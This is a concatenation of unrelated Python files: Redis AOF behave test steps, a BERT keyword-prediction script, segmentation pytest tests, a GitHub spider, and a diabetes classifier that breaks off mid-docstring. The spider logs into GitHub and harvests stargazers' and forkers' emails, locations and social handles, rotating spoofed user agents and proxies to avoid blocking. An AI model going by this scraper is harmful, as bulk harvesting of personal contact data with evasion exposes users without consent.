    # behave step: start the aof_funnel server from its test JSON config.
    context.oRedisAofFunnel = redis_aof_funnel(os.path.join(cTestConfigdir, 'test_aof_funnel.json'), bVerboseIP = True)
    context.oRedisAofFunnel.ServerStart()
@when(u'I make a change in the Redis database')
def ApplyChangeInRedisDb(context):
    # behave step: SET one randomly chosen key to a scrambled random value,
    # producing a write operation for the AOF to record.
    tKey = ('aapjes', 'nootjes', 'miesjes', 'schaapjes')
    context.oRedisClient.set(tKey[random.randrange(len(tKey))], ScrambleString(tKey[random.randrange(len(tKey))]))
@when(u'repeat \'I make a change in the Redis database\' {iAmountIP:n} times while waiting {iSecondIP:n} second each turn')
def RepeatApplyChangeInRedisDb(context, iAmountIP, iSecondIP):
    """behave step: apply exactly iAmountIP changes, sleeping iSecondIP
    seconds after each one.

    Bug fix: the previous ``while iRepetition <= iAmountIP`` loop executed
    the step iAmountIP + 1 times — one more than the scenario asked for.
    """
    for _ in range(iAmountIP):
        context.execute_steps(u'When I make a change in the Redis database')
        time.sleep(iSecondIP)
    # Give aof_read/aof_funnel a moment to process the writes before the
    # following assertion step runs.
    time.sleep(1.0)
@then(u'I see {iFileCountIP:n} archived files in the backup folder')
def AssertArchivedFileCount(context, iFileCountIP):
    """behave step: assert how many files were archived under today's
    backup folder, tearing down first so resources are always released."""
    # Count the aofchunk files in the testdata aofbackup folder
    tFilename = [cFile for _root, _dir, tFiles in os.walk(cAofBackupDir) for cFile in tFiles]
    iNumFiles = len(tFilename)
    # Teardown before asserting: the count is captured above, and cleanup
    # must happen even when the assertion fails.
    Teardown(context)
    assert iNumFiles == iFileCountIP, 'Got %s Expected %s' % (iNumFiles, iFileCountIP)
#EOF
|
import pandas as pd
import os
import json
import tldextract
import nltk
import multiprocessing
import time
import numpy as np
import networkx as nx
import pke
import random
from tqdm import tqdm
from difflib import SequenceMatcher
from bs4 import BeautifulSoup
from base64 import urlsafe_b64decode
from collections import Counter
# This file is used to test the pretrained BERT, by generating predictions
# on a few websites stored in test_urls.txt. This file should contain urls
# which are different than the ones used to train BERT.
use_html_adjustment = False  # toggle for HTML-aware preprocessing (unused here? verify)
bert_dir = 'bert_cased'  # directory with vocab/config/checkpoint of the BERT model
bert_data_dir = 'AL_data_store/test' #contains test.json
web_output_dir = 'AL_web_output'  # where per-website outputs are written
max_predictions = 20 # max number of predictions printed
max_keyword_length = 35  # keywords longer than this get their mass redistributed
importance_threshold = 0.005 # Minimum probability mass threshold considered
predict_batch_size = 256
max_seq_length = 512  # BERT max sequence length (tokens)
doc_stride = 128  # sliding-window stride for long documents
# TODO: Change network num (after training) to -1, and change actually_predict to True in global_domain_predictions
# best network = 13/14
def predict_text_packet(text_packet_list, actually_predict = True, network_num = -1):
    # This function takes as input a list of text_packets and returns a
    # dictionary mapping text_packets to a list of (predicted_keyword, weight)
    # tuples.
    # NOTE(review): network_num is accepted but never read — output_directory_num
    # is hard-coded to 13 below; confirm whether it should use network_num.
    output_directory_num = 13
    if actually_predict:
        # Serialize the packets to the SQuAD-style test.json that run_squad.py
        # expects (df_to_json is defined elsewhere in this project).
        text_packet_dataframe = pd.DataFrame(
            {'text_packet': text_packet_list})
        df_to_json(
            text_packet_dataframe,
            os.path.join(bert_data_dir, 'test.json'),
            testing_mode=True)
        # This command runs the prediction, and outputs to
        # outputs/n/nbest_predictions.json
        predict_cmd = '''
        export BERT_DIR={}
        python run_squad.py \
          --vocab_file=$BERT_DIR/vocab.txt \
          --bert_config_file=$BERT_DIR/bert_config.json \
          --init_checkpoint=$BERT_DIR/bert_model.ckpt \
          --do_train=False \
          --do_predict=True \
          --predict_file={}/test.json \
          --max_seq_length={} \
          --doc_stride={} \
          --output_dir=outputs/{} \
          --use_tpu=False \
          --version_2_with_negative=True \
          --predict_batch_size={} \
        '''.format(bert_dir, bert_data_dir, max_seq_length, doc_stride, output_directory_num, predict_batch_size)
        # Blocking shell invocation; only trusted module-level config is
        # interpolated into the command.
        os.system(predict_cmd)
    # When actually_predict is False, reuse the predictions from a prior run.
    output_dict = json.load(
        open(
            'outputs/{}/nbest_predictions.json'.format(output_directory_num),
            'r'))
    for text_packet, prediction in output_dict.items():
        for i in range(len(prediction)):
            # Ignore start and end logits
            prediction[i] = (prediction[i]['text'], prediction[i]['probability'])
    return output_dict
def calculate_keyword_mass(data):
    """Aggregate per-text-packet probabilities into one "mass" per keyword.

    *data* maps each text_packet to a list of (keyword, probability) tuples
    (the output of predict_text_packet).  A keyword's mass is the sum of its
    probabilities across all packets; keywords longer than
    max_keyword_length donate their probability, split evenly, to the
    shorter viable keywords contained inside them.  Returns keywords sorted
    by descending mass, e.g. [('key2', 0.2), ('key1', 0.1), ('key3', 0.0)].
    """
    print('Calculating Probability mass')
    # Initialize all keywords to mass 0.0.  set().union(...) instead of
    # set.union(*...) so an empty *data* yields an empty result rather than
    # raising TypeError (set.union needs at least one positional set).
    all_keywords = set().union(*[set(elem[0] for elem in v) for v in data.values()])
    keyword_prob_mass = dict.fromkeys(all_keywords, 0.0)
    for text_packet, keyword_dict in tqdm(data.items()):
        for keyword, prob in keyword_dict:
            if keyword and prob > importance_threshold:
                if len(keyword) <= max_keyword_length:
                    keyword_prob_mass[keyword] += prob
                else:
                    # For keywords greater than the max keyword length, we
                    # distribute their probability evenly across all viable
                    # candidates contained within them.
                    related_keywords = set()
                    for k, p in keyword_dict:
                        if k and not (keyword == k) and k in keyword and len(k) <= max_keyword_length and p > importance_threshold:
                            related_keywords.add(k)
                    for r in related_keywords:
                        keyword_prob_mass[r] += prob / len(related_keywords)
    keyword_prob_list = sorted(
        keyword_prob_mass.items(),
        key=lambda x: x[1],
        reverse=True)
    return keyword_prob_list
|
import os
import numpy as np
import pytest
import pytorch_lightning as pl
import torch.optim.optimizer
from omegaconf import OmegaConf
from pl_bolts.models.vision import UNet
from pytorch_lightning import seed_everything, Trainer
from src.datamodules.DivaHisDB.datamodule_cropped import DivaHisDBDataModuleCropped
from src.tasks.DivaHisDB.semantic_segmentation_cropped import SemanticSegmentationCroppedHisDB
from src.tasks.utils.outputs import OutputKeys
from tests.tasks.test_base_task import fake_log
from tests.test_data.dummy_data_hisdb.dummy_data import data_dir_cropped
@pytest.fixture(autouse=True)
def clear_resolvers():
    # Reset OmegaConf's resolver registry and the RNG seed before every test
    # so configuration and randomness cannot leak between tests.
    OmegaConf.clear_resolvers()
    seed_everything(42)
    os.environ['MKL_SERVICE_FORCE_INTEL'] = '1'
@pytest.fixture()
def model():
    # Small UNet keeps tests fast while exercising the real model path.
    return UNet(num_classes=4, num_layers=2, features_start=32)
@pytest.fixture()
def datamodule_and_dir(data_dir_cropped):
    # datamodule built on the dummy cropped HisDB fixture data
    data_module = DivaHisDBDataModuleCropped(
        data_dir=str(data_dir_cropped),
        data_folder_name='data', gt_folder_name='gt',
        batch_size=2, num_workers=2)
    return data_module, data_dir_cropped
@pytest.fixture()
def task(model, tmp_path):
    # Task under test: cropped semantic segmentation, writing test output to
    # a per-test tmp_path, with the validation confusion matrix enabled.
    task = SemanticSegmentationCroppedHisDB(model=model,
                                            optimizer=torch.optim.Adam(params=model.parameters()),
                                            loss_fn=torch.nn.CrossEntropyLoss(),
                                            test_output_path=tmp_path,
                                            confusion_matrix_val=True
                                            )
    return task
def test_semantic_segmentation(tmp_path, task, datamodule_and_dir):
    # End-to-end smoke test: fit for 2 epochs on CPU (ddp_cpu accelerator),
    # run test(), and compare the loss against a pinned reference value.
    data_module, data_dir_cropped = datamodule_and_dir
    # different paths needed later
    patches_path = task.test_output_path / 'patches'
    test_data_patch = data_dir_cropped / 'test' / 'data'
    trainer = pl.Trainer(max_epochs=2, precision=32, default_root_dir=task.test_output_path,
                         accelerator='ddp_cpu')
    trainer.fit(task, datamodule=data_module)
    results = trainer.test()
    print(results)
    # rtol=2e-03 tolerates small numeric drift across platforms/BLAS builds.
    assert np.isclose(results[0]['test/crossentropyloss'], 1.0896027088165283, rtol=2e-03)
    assert np.isclose(results[0]['test/crossentropyloss_epoch'], 1.0896027088165283, rtol=2e-03)
    # One prediction patch (.npy) must be written per input patch (.png).
    assert len(list(patches_path.glob('*/*.npy'))) == len(list(test_data_patch.glob('*/*.png')))
def test_to_metrics_format():
    # to_metrics_format reduces class scores to predicted labels:
    # argmax over the last dim maps [[1,2,3],[0,1,2]] -> [2, 2].
    x = torch.as_tensor([[1, 2, 3], [0, 1, 2]])
    y = SemanticSegmentationCroppedHisDB.to_metrics_format(x)
    assert torch.equal(torch.as_tensor([2, 2]), y)
def test_training_step(monkeypatch, datamodule_and_dir, task, capsys):
    # Run a single training_step on one train sample with a stubbed trainer
    # and fake logger, checking the logged and returned loss.
    data_module_cropped, data_dir_cropped = datamodule_and_dir
    trainer = Trainer()
    # Wire task <-> datamodule <-> trainer manually instead of trainer.fit().
    monkeypatch.setattr(data_module_cropped, 'trainer', trainer)
    monkeypatch.setattr(task, 'trainer', trainer)
    monkeypatch.setattr(trainer, 'datamodule', data_module_cropped)
    monkeypatch.setattr(task, 'log', fake_log)
    data_module_cropped.setup('fit')
    img, gt, mask = data_module_cropped.train[0]
    # [None, :] adds the batch dimension expected by the step.
    output = task.training_step(batch=(img[None, :], gt[None, :], mask[None, :]), batch_idx=0)
    assert 'train/crossentropyloss 1.4' in capsys.readouterr().out
    assert np.isclose(output[OutputKeys.LOSS].item(), 1.4348618984222412, rtol=2e-03)
def test_validation_step(monkeypatch, datamodule_and_dir, task, capsys):
    # Same wiring as the training test, but for validation_step with the
    # confusion matrix disabled (it needs a real trainer/logger otherwise).
    data_module_cropped, data_dir_cropped = datamodule_and_dir
    trainer = Trainer()
    monkeypatch.setattr(data_module_cropped, 'trainer', trainer)
    monkeypatch.setattr(task, 'trainer', trainer)
    monkeypatch.setattr(trainer, 'datamodule', data_module_cropped)
    monkeypatch.setattr(task, 'log', fake_log)
    monkeypatch.setattr(task, 'confusion_matrix_val', False)
    data_module_cropped.setup('fit')
    img, gt, mask = data_module_cropped.val[0]
    task.validation_step(batch=(img[None, :], gt[None, :], mask[None, :]), batch_idx=0)
    assert 'val/crossentropyloss 1.4' in capsys.readouterr().out
def test_test_step(monkeypatch, datamodule_and_dir, task, capsys, tmp_path):
    # test_step additionally writes prediction patches; verify both the
    # logged loss and the on-disk output layout under tmp_path.
    data_module_cropped, data_dir_cropped = datamodule_and_dir
    trainer = Trainer()
    monkeypatch.setattr(data_module_cropped, 'trainer', trainer)
    monkeypatch.setattr(task, 'trainer', trainer)
    monkeypatch.setattr(trainer, 'datamodule', data_module_cropped)
    monkeypatch.setattr(task, 'log', fake_log)
    monkeypatch.setattr(task, 'confusion_matrix_val', False)
    monkeypatch.setattr(task, 'test_output_path', tmp_path)
    data_module_cropped.setup('test')
    # Test samples also carry an index used to name the output patch.
    img, gt, mask, idx = data_module_cropped.test[0]
    idx_tensor = torch.as_tensor([idx])
    task.test_step(batch=(img[None, :], gt[None, :], mask[None, :], idx_tensor), batch_idx=0)
    assert 'test/crossentropyloss 1.4' in capsys.readouterr().out
    assert (tmp_path / 'patches').exists()
    assert (tmp_path / 'patches' / 'e-codices_fmb-cb-0055_0098v_max').exists()
    assert len(list((tmp_path / 'patches' / 'e-codices_fmb-cb-0055_0098v_max').iterdir())) == 1
|
<reponame>WenjieDu/GitHub_Spider_on_Star_Fork
"""
This spider is created by WenjieDu to crawl information of stargazers and forkers of specified repositories on GitHub.
"""
import argparse
import json
import logging
import os
import random
from time import sleep
import pandas as pd
import requests
from bs4 import BeautifulSoup
##################################################################################################
# Here are configurations you have to set
##################################################################################################
# repos that you want to crawl star and fork user info from
SPECIFIED_REPOS = [
]
# repos that you want to use for filtering
FILTERING_REPOS = [
]
# users that you want to manually exclude
EXCLUSION_USERS = [
]
USE_PROXY = False # whether to use proxy
PROXY_POOL_URL = 'http://127.0.0.1:8000' # pool url where you fetch proxies
# Manual configurations end here
##################################################################################################
SITE_DOMAIN = 'https://github.com'
STAR = "stargazers"
FORK = "network/members"
# STAR PLACEHOLDER start from 1
STAR_SELECTOR = "#repos > ol"
# FORK PLACEHOLDER start from 2
FORK_SELECTOR = "#network"
# user info selector
FULL_NAME_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.clearfix.d-flex.d-md-block.flex-items-center.mb-4.mb-md-0 > div.vcard-names-container.float-left.js-profile-editable-names.col-12.py-3.js-sticky.js-user-profile-sticky-fields > h1 > span.p-name.vcard-fullname.d-block.overflow-hidden"
LOCATION_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li.vcard-detail.pt-1.css-truncate.css-truncate-target.hide-sm.hide-md > span.p-label"
COMPANY_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li.vcard-detail.pt-1.css-truncate.css-truncate-target.hide-sm.hide-md > span.p-org > div"
EMAIL_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li> a.u-email"
WEBSITE_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li[itemprop=url] > a"
TWITTER_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li.hide-md > a"
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
def get_header():
    """Build browser-like request headers with a User-Agent chosen at
    random from USER_AGENTS, to vary the crawler's fingerprint."""
    picked_agent = random.choice(USER_AGENTS)
    return {
        'User-Agent': picked_agent,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
        'Accept-Encoding': 'gzip, deflate',
    }
def setup_logger(log_file_path, mode='a'):
    """Configure and return the root logger at INFO level, with a file
    handler writing to *log_file_path* (opened with *mode*) and a console
    handler, both using an asctime-prefixed format."""
    logger = logging.getLogger()
    logger.setLevel(logging.INFO)
    formatter = logging.Formatter('%(asctime)s - %(message)s')
    file_handler = logging.FileHandler(log_file_path, mode=mode)
    console_handler = logging.StreamHandler()
    # add the handlers to the logger
    for handler in (file_handler, console_handler):
        handler.setLevel(logging.INFO)
        handler.setFormatter(formatter)
        logger.addHandler(handler)
    return logger
def get_proxy():
    """Return a requests-style proxies dict from the proxy pool, or None to
    use the local IP (with a politeness delay)."""
    if random.randint(0, 10) > 4: # 50% to use proxy, you can adjust it if you like
        all_proxies = json.loads(requests.get(PROXY_POOL_URL).text)
        # NOTE(review): i[2] looks like a quality/score field in the pool's
        # response (host, port, score?) — confirm the pool's schema.
        all_proxies = [i for i in all_proxies if i[2] > 4]
        # logger.info(f'Total proxy num: {len(all_proxies)}')
        picked = random.choice(all_proxies)
        return {'http': f'http://{picked[0]}:{picked[1]}'}
    else:
        sleep(2) # if use local ip, then set delay
        return None
def request_url(url, sess=None):
    """GET *url* (via *sess* when given, so login cookies persist), retrying
    until a 200 response, and return the parsed BeautifulSoup document.

    Each attempt uses a fresh random User-Agent and, when USE_PROXY is set,
    a proxy from the pool.  NOTE(review): non-200 responses retry every 3s
    with no cap — a permanently missing page loops forever.
    """
    while True:
        try:
            header = get_header()
            picked_proxy = get_proxy() if USE_PROXY else None
            if sess:
                response = sess.get(url, headers=header, timeout=(25, 30), proxies=picked_proxy)
            else:
                response = requests.get(url, headers=header, timeout=(25, 30), proxies=picked_proxy)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # can still break out of this retry loop.
            # logger.info('Proxy failed once, try again')
            continue
        if response.status_code == 200:
            break
        else:
            sleep(3)
            logger.info('Request failed once, try again')
    return BeautifulSoup(response.text, 'lxml')
def crawl_user_from_repos(repos):
    """ crawl star and fork users from specified repos
    :param repos: specified github repo names
    :return: crawled users in one list
    """
    users = set()
    for repo in repos:
        repo_url = os.path.join(SITE_DOMAIN, repo)
        logger.info(f'Start to crawl info from repo {repo_url}')
        repo_star_page = os.path.join(repo_url, STAR)
        repo_fork_page = os.path.join(repo_url, FORK)
        star_set, fork_set = [], []
        # request docs of star page and gather stargazers, num of stargazer page may be more than one
        logger.info(f'Crawling {repo_star_page}...')
        soup = request_url(repo_star_page)
        while True:
            stargazer_block = soup.select_one(STAR_SELECTOR) # select the whole block
            # Iterating the block yields its children; drop whitespace nodes.
            stargazer_block = set([i for i in stargazer_block])
            stargazer_block.remove('\n')
            for i in stargazer_block:
                # Username text sits inside the nested span/anchor of each row.
                star_set.append(
                    i.select_one("div > div.ml-3.flex-auto.min-width-0 > h3 > span > span > a").text
                )
            # Follow the "Next" pagination link until it disappears.
            next_page = soup.select("#repos > div.paginate-container > div > a")
            if next_page and next_page[-1].text == 'Next':
                soup = request_url(next_page[-1]['href'])
            else:
                break
        # request docs of fork page and gather forkers, forkers are all on one page
        logger.info(f'Crawling {repo_fork_page}...')
        soup = request_url(repo_fork_page)
        forker_block = soup.select_one(FORK_SELECTOR) # select the whole block
        forker_block = set([i for i in forker_block][2:]) # the first two need to be removed
        forker_block.remove('\n')
        for i in forker_block:
            fork_set.append(i.select_one("div> a:nth-child(3)").text)
        # get union of stargazers and forkers
        union_set = set(star_set).union(set(fork_set))
        users = users.union(union_set)
    return set(users)
def crawl_user_info(users, sess):
    """ crawl user info from their profile pages

    :param users: iterable of GitHub usernames
    :param sess: session with github account login. Email info is not available if the session is invalid.
    :return: crawled user info in pandas dataframe (one row per user)
    """
    columns = ['user', 'full_name', 'location', 'company', 'email', 'website', 'twitter']
    # One CSS selector per profile field (module-level constants).
    selectors = {
        'full_name': FULL_NAME_SELECTOR,
        'location': LOCATION_SELECTOR,
        'company': COMPANY_SELECTOR,
        'email': EMAIL_SELECTOR,
        'website': WEBSITE_SELECTOR,
        'twitter': TWITTER_SELECTOR,
    }
    rows = []
    for user in users:
        logger.info(f'Crawling info of user {user}...')
        user_page = os.path.join(SITE_DOMAIN, user)
        # request docs of user page and gather user info
        soup = request_url(user_page, sess)
        info_dict = {'user': user}
        for field, selector in selectors.items():
            # select_one returns None when the element is absent; record None
            # explicitly instead of the old broad try/except around .text.
            node = soup.select_one(selector)
            info_dict[field] = node.text if node is not None else None
        rows.append(info_dict)
    # Bug fix: DataFrame.append was deprecated and removed in pandas 2.0;
    # collect rows and build the frame in one shot instead.
    return pd.DataFrame(rows, columns=columns)
def bool(op):
    """Parse a truthy command-line string: 'true', 'yes', 'y' or 't'
    (case-insensitive) map to True; everything else to False.

    NOTE(review): this deliberately shadows the builtin ``bool`` because the
    argparse calls below use ``type=bool``; renaming it would change that
    interface.

    Bug fix: ``op.lower() == ('true' or 'yes' or 'y' or 't')`` evaluated the
    ``or`` chain to just 'true', so 'yes'/'y'/'t' were wrongly rejected.
    Membership testing matches all four spellings.
    """
    return op.lower() in ('true', 'yes', 'y', 't')
if __name__ == '__main__':
    # CLI flags are parsed with the module's custom string->bool parser above.
    parser = argparse.ArgumentParser()
    parser.add_argument('--crawl_different_users', type=bool, default=True,
                        help='whether to crawl detailed info of different users')
    parser.add_argument('--crawl_same_users', type=bool, default=False,
                        help='whether to crawl detailed info of same users')
    parser.add_argument('--ensure_successful_github_login', type=bool, default=True,
                        help='whether to ensure login github successful, namely you want to crawl emails')
    args = parser.parse_args()
    logger = setup_logger("spider.log", mode='w')
    logger.info(args)
    # crawl users that already star or fork EXCLUSION_REPOS
    interested_users = crawl_user_from_repos(SPECIFIED_REPOS)
    excluded_users = crawl_user_from_repos(FILTERING_REPOS)
    if len(EXCLUSION_USERS) > 0:
        excluded_users = excluded_users.union(set(EXCLUSION_USERS))
    # Users of interest that are NOT in the filtering/exclusion set...
    different_users = list(
        set(interested_users).difference(set(excluded_users))
    )
    # ...and those appearing in both.
    same_users = list(
        set(interested_users).intersection(set(excluded_users))
    )
    logger.info(f"Got {len(different_users)} different users: \n {different_users}")
    logger.info(f"Got {len(same_users)} same users: \n {same_users}")
    if args.crawl_same_users or args.crawl_different_users:
        # Credentials are read from a local JSON file, not hard-coded.
        with open('github_credential.json') as f:
            credential = json.load(f)
            github_username = credential["username"]
            github_password = credential["password"]
        login_url = 'https://github.com/login'
        session_url = 'https://github.com/session'
        with requests.session() as session:
            # login github
            # GitHub's login form requires the CSRF authenticity_token from
            # the login page to be posted back with the credentials.
            login_html = session.get(login_url).content.decode()
            bs = BeautifulSoup(login_html, features="html.parser")
            input_label = bs.find(attrs={"name": "authenticity_token"})
            authenticity_token = input_label.attrs["value"]
            # build request arguments for login api
            data = {
                "commit": "Sign in",
                "authenticity_token": authenticity_token,
                "login": github_username,
                "password": <PASSWORD>,
                "webauthn-support": "supported"
            }
            session.post(session_url, data=data)
            response = session.get("https://github.com/settings/profile")
            # The settings page titled "Your Profile" is only reachable when
            # logged in, so it doubles as a login check.
            settings_html = session.get("https://github.com/settings/profile").content.decode()
            bs = BeautifulSoup(settings_html, features="html.parser")
            if bs.title.string == "Your Profile":
                logger.info('Login successfully.')
            else:
                logger.warning('Login failed. Please check your github username and password.')
                if args.ensure_successful_github_login:
                    logger.error('Quit now because of failed login.')
                    quit()
            # crawling user info
            if args.crawl_same_users:
                logger.info('Crawling info_same_users...')
                info_same_users = crawl_user_info(same_users, session)
                logger.info('Saving info_same_users into csv file...')
                info_same_users.to_csv('crawled_same_users.csv')
            if args.crawl_different_users:
                logger.info('Crawling info_different_users...')
                info_different_users = crawl_user_info(different_users, session)
                logger.info('Saving info_different_users into csv file...')
                info_different_users.to_csv('crawled_different_users.csv')
    logger.info('All finished.')
|
"""
pyt_pima_diabetes.py: binary classification (of imbalanced data) of PIMA Diabates dataset
@author: <NAME>
My experiments with Python, Machine Learning & Deep Learning.
This code is meant for education purposes only & is not intended for commercial/production use!
Use at your own risk!! I am not responsible if your CPU or GPU gets fried :D
"""
import pytorch_toolkit as pytk
from torch.utils.data import Dataset
import torch.nn.functional as F
import torch.nn as nn
import torch
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import random
import sys
import os
import warnings
# Silence library warnings for cleaner console output.
warnings.filterwarnings('ignore')
# tweaks for libraries
np.set_printoptions(precision=6, linewidth=1024, suppress=True)
plt.style.use('seaborn')
sns.set_style('darkgrid')
sns.set_context('notebook', font_scale=1.10)
# Pytorch imports
print('Using Pytorch version: ', torch.__version__)
# import pytorch_toolkit - training Nirvana :)
# to ensure that you get consistent results across runs & machines
# @see: https://discuss.pytorch.org/t/reproducibility-over-different-machines/63047
# Seed every RNG in play (Python, hash, NumPy, Torch CPU/CUDA).
SEED = 41
random.seed(SEED)
os.environ['PYTHONHASHSEED'] = str(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
if torch.cuda.is_available():
    torch.cuda.manual_seed(SEED)
    torch.cuda.manual_seed_all(SEED)
    # Trade CUDA performance for deterministic results.
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    torch.backends.cudnn.enabled = False
# Dataset source URL; downloaded once, then cached at local_data_path.
url = r'https://raw.githubusercontent.com/a-coders-guide-to-ai/a-coders-guide-to-neural-networks/master/data/diabetes.csv'
local_data_path = './data/diabetes.csv'
def load_data(upsample=False, test_split=0.20):
    """Load the PIMA diabetes CSV and return scaled train/val/test splits.

    Downloads the data on first use and caches it under ./data; later calls
    read the local copy.

    Args:
        upsample (bool): if True, randomly duplicate minority-class (label 1)
            training rows until both classes are balanced.
        test_split (float): fraction held out for the test set, and again for
            the validation set carved from the remaining training data.

    Returns:
        ((X_train, y_train), (X_val, y_val), (X_test, y_test)) — X arrays are
